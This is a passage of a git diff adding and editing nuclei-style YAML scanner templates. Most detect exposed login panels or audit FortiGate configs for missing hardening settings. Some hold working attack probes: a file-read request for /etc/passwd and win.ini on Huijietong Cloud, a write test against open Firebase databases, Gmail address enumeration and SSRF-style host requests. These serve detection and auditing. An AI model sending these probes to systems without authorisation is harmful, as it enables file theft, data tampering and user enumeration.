- "resterrorresponse"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 401
|
|
@ -6,6 +6,8 @@ info:
|
|||
severity: info
|
||||
reference:
|
||||
- https://www.shodan.io/search?query=http.title%3A%22ColdFusion+Administrator+Login%22
|
||||
metadata:
|
||||
shodan-query: http.component:"Adobe ColdFusion"
|
||||
tags: panel,coldfusion,adobe
|
||||
|
||||
requests:
|
||||
|
|
|
@ -0,0 +1,27 @@
|
|||
id: rg-uac-panel
|
||||
|
||||
info:
|
||||
name: RG-UAC Ruijie Login Panel
|
||||
author: princechaddha
|
||||
severity: info
|
||||
metadata:
|
||||
shodan-query: http.html:"Get_Verify_Info"
|
||||
tags: panel,ruijie,router,firewall
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "dkey_check.php"
|
||||
- "get_dkey_passwd"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,28 @@
|
|||
id: auto-usb-install
|
||||
|
||||
info:
|
||||
name: Auto USB Installation Enabled
|
||||
author: pussycat0x
|
||||
severity: info
|
||||
description: If USB installation is not disabled, an attacker with physical access to a FortiGate could load a new configuration or firmware using the USB port.
|
||||
reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
|
||||
tags: fortigate,config,audit,firewall
|
||||
|
||||
file:
|
||||
- extensions:
|
||||
- conf
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "set auto-install-config disable"
|
||||
- "set auto-install-image disable"
|
||||
negative: true
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "config system"
|
||||
- "config router"
|
||||
- "config firewall"
|
||||
condition: or
|
|
@ -0,0 +1,28 @@
|
|||
id: heuristic-scan
|
||||
|
||||
info:
|
||||
name: Heuristic scanning is not configured
|
||||
author: pussycat0x
|
||||
severity: info
|
||||
description: Heuristic scanning is a technique used to identify previously unknown viruses. A value of block enables heuristic AV scanning of binary files and blocks any detected. A replacement message will be forwarded to the recipient. Blocked files are quarantined if quarantine is enabled.
|
||||
reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
|
||||
tags: fortigate,config,audit,firewall
|
||||
|
||||
file:
|
||||
- extensions:
|
||||
- conf
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "config antivirus heuristic"
|
||||
- "set mode block"
|
||||
negative: true
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "config system"
|
||||
- "config router"
|
||||
- "config firewall"
|
||||
condition: or
|
|
@ -0,0 +1,27 @@
|
|||
id: inactivity-timeout
|
||||
|
||||
info:
|
||||
name: Inactivity Timeout Not Implemented
|
||||
author: pussycat0x
|
||||
severity: info
|
||||
description: Lack of Inactivity Timeout gives the unauthorized user to act within that threshold if the administrator is away from the computer.
|
||||
reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
|
||||
tags: fortigate,config,audit,firewall
|
||||
|
||||
file:
|
||||
- extensions:
|
||||
- conf
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "set admin-console-timeout"
|
||||
negative: true
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "config system"
|
||||
- "config router"
|
||||
- "config firewall"
|
||||
condition: or
|
|
@ -0,0 +1,27 @@
|
|||
id: maintainer-account
|
||||
|
||||
info:
|
||||
name: Maintainer Account Not Implemented
|
||||
author: pussycat0x
|
||||
severity: info
|
||||
description: If the FortiGate is compromised and Password is not recoverable. A maintainer account can be used by an administrator with physical access to log into CLI..
|
||||
reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate
|
||||
tags: fortigate,config,audit,firewall
|
||||
|
||||
file:
|
||||
- extensions:
|
||||
- conf
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "set admin-maintainer"
|
||||
negative: true
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "config system"
|
||||
- "config router"
|
||||
- "config firewall"
|
||||
condition: or
|
|
@ -0,0 +1,27 @@
|
|||
id: password-policy
|
||||
|
||||
info:
|
||||
name: Password Policy not Set
|
||||
author: pussycat0x
|
||||
severity: info
|
||||
description: The Administrative Password Policy is not set. Use the password policy feature to ensure all administrators use secure passwords that meet your organization's requirements.
|
||||
reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
|
||||
tags: fortigate,config,audit,firewall
|
||||
|
||||
file:
|
||||
- extensions:
|
||||
- conf
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "config system password-policy"
|
||||
negative: true
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "config system"
|
||||
- "config router"
|
||||
- "config firewall"
|
||||
condition: or
|
|
@ -0,0 +1,27 @@
|
|||
id: remote-auth-timeout
|
||||
|
||||
info:
|
||||
name: Remote Authentication timeout not set
|
||||
author: pussycat0x
|
||||
severity: info
|
||||
description: Lack of Inactivity Timeout gives the unauthorized user to act within that threshold if the administrator is away from the computer.
|
||||
reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate
|
||||
tags: fortigate,config,audit,firewall
|
||||
|
||||
file:
|
||||
- extensions:
|
||||
- conf
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "set remoteauthtimeout"
|
||||
negative: true
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "config system"
|
||||
- "config router"
|
||||
- "config firewall"
|
||||
condition: or
|
|
@ -0,0 +1,27 @@
|
|||
id: scp-admin
|
||||
|
||||
info:
|
||||
name: Admin-SCP Disabled
|
||||
author: pussycat0x
|
||||
severity: info
|
||||
description: Disable SCP by default. Enabling SCP allows downloading the configuration file from the FortiGate as an alternative method of backing up the configuration file.
|
||||
reference: https://docs.fortinet.com/document/fortigate/6.4.0/hardening-your-fortigate/612504/hardening-your-fortigate
|
||||
tags: fortigate,config,audit,firewall
|
||||
|
||||
file:
|
||||
- extensions:
|
||||
- conf
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "set admin-scp enable"
|
||||
negative: true
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "config system"
|
||||
- "config router"
|
||||
- "config firewall"
|
||||
condition: or
|
|
@ -0,0 +1,27 @@
|
|||
id: strong-ciphers
|
||||
|
||||
info:
|
||||
name: HTTPS/SSH Strong Ciphers Not Enabled
|
||||
author: pussycat0x
|
||||
severity: info
|
||||
description: Weak Ciphers can be broken by an attacker in a local network and can perform attacks like Blowfish.
|
||||
reference: https://docs.fortinet.com/document/fortigate/6.2.0/hardening-your-fortigate/582009/system-administrator-best-practices
|
||||
tags: fortigate,config,audit,firewall
|
||||
|
||||
file:
|
||||
- extensions:
|
||||
- conf
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "set strong-crypto enable"
|
||||
negative: true
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "config system"
|
||||
- "config router"
|
||||
- "config firewall"
|
||||
condition: or
|
|
@ -0,0 +1,20 @@
|
|||
id: valid-gmail-checker
|
||||
|
||||
info:
|
||||
name: Valid Google Mail Checker
|
||||
author: dievus,dwisiswant0
|
||||
severity: info
|
||||
reference:
|
||||
- https://github.com/dievus/geeMailUserFinder
|
||||
|
||||
self-contained: true
|
||||
requests:
|
||||
- method: HEAD
|
||||
path:
|
||||
- "https://mail.google.com/mail/gxlu?email={{email}}"
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "COMPASS"
|
|
@ -0,0 +1,37 @@
|
|||
id: insecure-firebase-database
|
||||
|
||||
info:
|
||||
name: Insecure Firebase Database
|
||||
author: rafaelwdornelas
|
||||
severity: high
|
||||
description: If the owner of the app have set the security rules as true for both "read" & "write" an attacker can probably dump database and write his own data to firebase database.
|
||||
reference:
|
||||
- https://blog.securitybreached.org/2020/02/04/exploiting-insecure-firebase-database-bugbounty
|
||||
metadata:
|
||||
verified: true
|
||||
tags: firebase,google,misconfig
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
PUT /{{randstr}}.json HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/json
|
||||
|
||||
{"id":"insecure-firebase-database"}
|
||||
|
||||
- |
|
||||
GET /{{randstr}}.json HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
req-condition: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body_2
|
||||
words:
|
||||
- '{"id":"insecure-firebase-database"}'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -29,6 +29,7 @@ requests:
|
|||
- |+
|
||||
GET http://{{hostval}}/dynamic/instance-identity/document HTTP/1.1
|
||||
Host: {{hostval}}
|
||||
|
||||
payloads:
|
||||
hostval:
|
||||
- alibaba.interact.sh
|
||||
|
|
|
@ -21,21 +21,27 @@ requests:
|
|||
- |+
|
||||
GET / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |+
|
||||
GET http://somethingthatdoesnotexist/ HTTP/1.1
|
||||
Host: somethingthatdoesnotexist
|
||||
|
||||
- |+
|
||||
GET http://127.0.0.1/ HTTP/1.1
|
||||
Host: 127.0.0.1
|
||||
|
||||
- |+
|
||||
GET https://127.0.0.1/ HTTP/1.1
|
||||
Host: 127.0.0.1
|
||||
|
||||
- |+
|
||||
GET http://localhost/ HTTP/1.1
|
||||
Host: localhost
|
||||
|
||||
- |+
|
||||
GET https://localhost/ HTTP/1.1
|
||||
Host: localhost
|
||||
|
||||
unsafe: true
|
||||
req-condition: true
|
||||
stop-at-first-match: true
|
||||
|
|
|
@ -61,4 +61,4 @@ requests:
|
|||
- (!regex("(?i)POP3",body_1)) && (!regex("(?i)POP3",body_2)) && (regex("(?i)POP3",body_6))
|
||||
- (!regex("(?i)SMTP",body_1)) && (!regex("(?i)SMTP",body_2)) && ((regex("(?i)SMTP",body_5)) || (regex("(?i)SMTP",body_7)) || (regex("(?i)SMTP",body_8)))
|
||||
|
||||
# Updated by Chris on 2022/01/21
|
||||
# Enhanced by cs on 2022/01/21
|
||||
|
|
|
@ -0,0 +1,27 @@
|
|||
id: unauthenticated-nginx-dashboard
|
||||
|
||||
info:
|
||||
name: Nginx Dashboard
|
||||
author: BibekSapkota (sar00n)
|
||||
severity: low
|
||||
reference:
|
||||
- https://www.acunetix.com/vulnerabilities/web/unrestricted-access-to-nginx-dashboard/
|
||||
metadata:
|
||||
shpdan-query: html:"NGINX+ Dashboard"
|
||||
tags: misconfig,nginx
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/dashboard.html"
|
||||
|
||||
max-size: 2048
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- 'Nginx+ Dashboard'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -18,8 +18,9 @@ network:
|
|||
- "{{Host}}:9000"
|
||||
|
||||
read-size: 100
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "ClickHouse"
|
||||
- "UTC"
|
||||
condition: and
|
|
@ -5,6 +5,9 @@ info:
|
|||
author: philippedelteil
|
||||
severity: info
|
||||
description: With this template we can detect the version number of Coldfusion instances based on their logos.
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.component:"Adobe ColdFusion"
|
||||
tags: adobe,coldfusion
|
||||
|
||||
requests:
|
||||
|
|
|
@ -7,6 +7,9 @@ info:
|
|||
description: With this template we can detect a running ColdFusion instance due to an error page.
|
||||
reference:
|
||||
- https://twitter.com/PhilippeDelteil/status/1418622775829348358
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.component:"Adobe ColdFusion"
|
||||
tags: adobe,coldfusion
|
||||
|
||||
requests:
|
||||
|
|
|
@ -1,8 +1,8 @@
|
|||
id: nginx-version
|
||||
|
||||
info:
|
||||
name: nginx version detect
|
||||
author: philippedelteil
|
||||
name: Nginx version detect
|
||||
author: philippedelteil,daffainfo
|
||||
severity: info
|
||||
description: Some nginx servers have the version on the response header. Useful when you need to find specific CVEs on your targets.
|
||||
tags: tech,nginx
|
||||
|
@ -11,20 +11,20 @@ requests:
|
|||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- "nginx+"
|
||||
- 'nginx/[0-9.]+'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: kval
|
||||
- type: regex
|
||||
part: header
|
||||
kval:
|
||||
- Server
|
||||
regex:
|
||||
- 'nginx/[0-9.]+'
|
||||
|
|
|
@ -9,9 +9,10 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/gotoURL.asp?url=google.com&id=43569"
|
||||
- "{{BaseURL}}/gotoURL.asp?url=example.com&id=43569"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?google\.com(?:\s*)$'
|
||||
- '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*)$'
|
|
@ -2,8 +2,10 @@ id: huijietong-cloud-fileread
|
|||
|
||||
info:
|
||||
name: Huijietong Cloud File Read
|
||||
author: princechaddha
|
||||
author: princechaddha,ritikchaddha
|
||||
severity: high
|
||||
metadata:
|
||||
fofa-query: body="/him/api/rest/v1.0/node/role"
|
||||
tags: huijietong,lfi
|
||||
|
||||
requests:
|
||||
|
@ -12,12 +14,19 @@ requests:
|
|||
- "{{BaseURL}}/fileDownload?action=downloadBackupFile"
|
||||
body: 'fullPath=/etc/passwd'
|
||||
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/fileDownload?action=downloadBackupFile"
|
||||
body: 'fullPath=/Windows/win.ini'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
- "\\[(font|extension|file)s\\]"
|
||||
condition: or
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue